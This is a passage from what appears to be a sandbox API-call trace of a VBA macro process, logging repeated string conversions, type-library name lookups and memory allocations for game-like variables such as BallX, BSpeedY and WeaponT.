cbMultiByte=12, lpWideCharStr=0x2e46a0, cchWideChar=12 | out: lpWideCharStr="_B_var_UniB") returned 12 [0033.235] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.235] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_UniB", lHashVal=0x10049c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.235] IUnknown:Release (This=0x782a220) returned 0x1a [0033.235] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.235] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_UniB", lHashVal=0x10049c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.235] IUnknown:Release (This=0x731da90) returned 0x15 [0033.235] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.235] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_UniB", lHashVal=0x10049c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.235] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.235] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.235] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_UniB", lHashVal=0x10049c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.235] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.235] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.235] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_UniB", lHashVal=0x10049c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.235] IUnknown:Release (This=0x782b300) returned 0x6 [0033.235] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.235] IUnknown:Release (This=0x782a220) returned 0x1a [0033.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.235] wcscpy_s (in: _Destination=0xb5c85e0, _SizeInWords=0x4, _Source="all" | out: _Destination="all") returned 0x0 [0033.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e02, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallX") returned 0 [0033.235] wcscpy_s (in: _Destination=0xb5c85f0, _SizeInWords=0x6, _Source="BallX" | out: _Destination="BallX") returned 0x0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.236] wcscpy_s (in: _Destination=0xb5c8608, _SizeInWords=0x6, _Source="BallY" | out: _Destination="BallY") returned 0x0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.236] wcscpy_s (in: _Destination=0xb5c8620, _SizeInWords=0x8, _Source="BSpeedX" | out: _Destination="BSpeedX") returned 0x0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.236] wcscpy_s (in: _Destination=0xb5c8638, _SizeInWords=0x8, _Source="BSpeedY" | out: _Destination="BSpeedY") returned 0x0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.236] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d50000 [0033.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.237] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Speed") returned 0x10037a [0033.237] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x6, _Src="Speed" | out: _Dst="Speed") returned 0x0 [0033.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=6, lpWideCharStr=0x2e44f0, cchWideChar=6 | out: lpWideCharStr="Speed") returned 6 [0033.237] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.237] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Speed", lHashVal=0x10037a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.237] IUnknown:Release (This=0x782a220) returned 0x1a [0033.237] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.238] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Speed", lHashVal=0x10037a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.238] IUnknown:Release (This=0x731da90) returned 0x15 [0033.238] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.238] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Speed", lHashVal=0x10037a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.238] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.238] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.238] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Speed", lHashVal=0x10037a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.238] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.238] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb4963f0 [0033.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Speed") returned 0x10c7a6 [0033.238] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xd, _Src="_B_var_Speed" | out: _Dst="_B_var_Speed") returned 0x0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=13, lpWideCharStr=0x2e46a0, cchWideChar=13 | out: lpWideCharStr="_B_var_Speed") returned 13 [0033.238] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.238] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Speed", lHashVal=0x10c7a6, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.238] IUnknown:Release (This=0x782a220) returned 0x1a [0033.238] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.238] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Speed", lHashVal=0x10c7a6, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.238] IUnknown:Release (This=0x731da90) returned 0x15 [0033.238] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.238] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Speed", lHashVal=0x10c7a6, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.238] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.238] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.238] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Speed", lHashVal=0x10c7a6, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.238] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.238] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.238] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Speed", lHashVal=0x10c7a6, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.238] IUnknown:Release (This=0x782b300) returned 0x6 [0033.238] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.238] IUnknown:Release (This=0x782a220) returned 0x1a [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.239] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d60000 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51eca, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopX") returned 0 [0033.240] wcscpy_s (in: _Destination=0xb5c8650, _SizeInWords=0x7, _Source="BLoopX" | out: _Destination="BLoopX") returned 0x0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e52, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedX") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51eca, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopX") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51eca, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopX") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51ef2, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveX") returned 0 [0033.240] wcscpy_s (in: _Destination=0xb5c8668, _SizeInWords=0x7, _Source="BMoveX" | out: _Destination="BMoveX") returned 0x0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51eca, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopX") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51eca, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopX") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f1a, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopY") returned 0 [0033.240] wcscpy_s (in: _Destination=0xb5c8680, _SizeInWords=0x7, _Source="BLoopY" | out: _Destination="BLoopY") returned 0x0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e7a, cbMultiByte=9, lpWideCharStr=0x2e4560, cchWideChar=8 | out: lpWideCharStr="BSpeedY") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f1a, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopY") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f1a, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopY") returned 0 [0033.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.241] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d80000 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f42, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BMoveY") returned 0 [0033.242] wcscpy_s (in: _Destination=0xb5c8698, _SizeInWords=0x7, _Source="BMoveY" | out: _Destination="BMoveY") returned 0x0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f1a, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopY") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51f1a, cbMultiByte=8, lpWideCharStr=0x2e4560, cchWideChar=7 | out: lpWideCharStr="BLoopY") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e02, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallX") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e02, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallX") returned 0 [0033.242] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9d90000 [0033.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51dde, cbMultiByte=5, lpWideCharStr=0x2e4560, cchWideChar=4 | out: lpWideCharStr="all") returned 0 [0033.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51e2a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="BallY") returned 0 [0033.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WeaponT") returned 0x10e418 [0033.243] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x8, _Src="WeaponT" | out: _Dst="WeaponT") returned 0x0 [0033.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=8, lpWideCharStr=0x2e44f0, cchWideChar=8 | out: lpWideCharStr="WeaponT") returned 8 [0033.243] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.243] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="WeaponT", lHashVal=0x10e418, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.243] IUnknown:Release (This=0x782a220) returned 0x1a [0033.243] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.243] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="WeaponT", lHashVal=0x10e418, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.243] IUnknown:Release (This=0x731da90) returned 0x15 [0033.243] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.243] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="WeaponT", lHashVal=0x10e418, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.243] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.243] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.243] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="WeaponT", lHashVal=0x10e418, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0033.243] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.243] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x9da0000 [0033.244] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb4963f0 [0033.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WeaponT") returned 0x10e79c [0033.244] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xf, _Src="_B_var_WeaponT" | out: _Dst="_B_var_WeaponT") returned 0x0 [0033.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=15, lpWideCharStr=0x2e46a0, cchWideChar=15 | out: lpWideCharStr="_B_var_WeaponT") returned 15 [0033.244] IUnknown:AddRef (This=0x782a220) returned 0x1b [0033.244] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_WeaponT", lHashVal=0x10e79c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.244] IUnknown:Release (This=0x782a220) returned 0x1a [0033.244] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.244] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_WeaponT", lHashVal=0x10e79c, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0033.244] IUnknown:Release (This=0x731da90) returned 0x15 [0033.244] 